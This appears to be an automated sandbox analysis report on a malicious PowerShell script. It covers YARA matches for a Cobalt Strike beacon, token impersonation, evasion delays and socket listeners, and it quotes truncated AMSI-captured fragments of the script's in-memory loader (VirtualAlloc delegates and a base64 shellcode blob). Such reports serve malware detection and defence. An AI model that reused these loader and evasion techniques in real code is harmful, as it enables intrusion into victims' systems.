Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.evad.winPS1@2/5@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_0000022EFA0C0B70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C867C TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_0000022EFA0C867C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5noeq2o4.gsw.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: 3.ps1 ReversingLabs: Detection: 73%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Z
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('bnlicXZrqsZros8DIyMja64+ydzc3Guq/Gui4PerIiPc8GKb05aBdUsnIyMjeWuq2tzzIyMjIyMjIyMjIyIjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyOmhQ4/4uRgbO
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0000022EFA0D9744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B4776C push 0000006Ah; retf 0_2_0000022EF9B47784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B41F35 push rsp; iretw 0_2_0000022EF9B41F36
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E3935 push rsp; iretw 0_2_0000022EFA0E3936
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E916C push 0000006Ah; retf 0_2_0000022EFA0E9184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B895B77 pushad ; iretd 0_2_00007FFD9B895BB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B89A26C push esp; retf 0_2_00007FFD9B89A26D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B9603E9 push cs; iretd 0_2_00007FFD9B96040A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B964FAD push ss; iretd 0_2_00007FFD9B9651F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B967F1D push ecx; iretd 0_2_00007FFD9B967F1E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B964218 push eax; ret 0_2_00007FFD9B964219
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B9679EA push esi; iretd 0_2_00007FFD9B9679EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B96158C push edi; ret 0_2_00007FFD9B961598
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B9654D0 push ds; iretd 0_2_00007FFD9B9654D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B967CAD push esp; iretd 0_2_00007FFD9B967CAE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D01A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0000022EFA0D01A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C5854 0_2_0000022EFA0C5854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0BFA1C 0_2_0000022EFA0BFA1C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3583
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6247
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe API coverage: 2.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_0000022EFA0C1C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_0000022EFA0C9220
Source: powershell.exe, 00000000.00000002.4121090412.0000022EF9CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: powershell.exe, 00000000.00000002.4121724697.0000022EF9DBA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4121724697.0000022EF9DB6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0000022EFA0D9744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C76F0 InitializeProcThreadAttributeList,GetProcessHeap,HeapAlloc,InitializeProcThreadAttributeList, 0_2_0000022EFA0C76F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E24E0 RtlVirtualUnwind,SetUnhandledExceptionFilter, 0_2_0000022EFA0E24E0

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0CDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_0000022EFA0CDF50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0CDEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0000022EFA0CDEC8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C0920 CreateNamedPipeA, 0_2_0000022EFA0C0920
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DECB0 GetSystemTimeAsFileTime, 0_2_0000022EFA0DECB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E2068 GetUserNameA, 0_2_0000022EFA0E2068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf, 0_2_0000022EFA0C5E28

Remote Access Functionality

Source: Yara match File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
Source: Yara match File source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 3.ps1, type: SAMPLE
Source: Yara match File source: amsi64_1900.amsi.csv, type: OTHER
Source: Yara match File source: 00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4114351286.0000022EF1952000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4098790194.0000022EE28B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C6670 htonl,htons,socket,closesocket,bind,ioctlsocket, 0_2_0000022EFA0C6670
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0CEE8C socket,closesocket,htons,bind,listen, 0_2_0000022EFA0CEE8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E2630 bind, 0_2_0000022EFA0E2630
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C6A78 socket,htons,ioctlsocket,closesocket,bind,listen, 0_2_0000022EFA0C6A78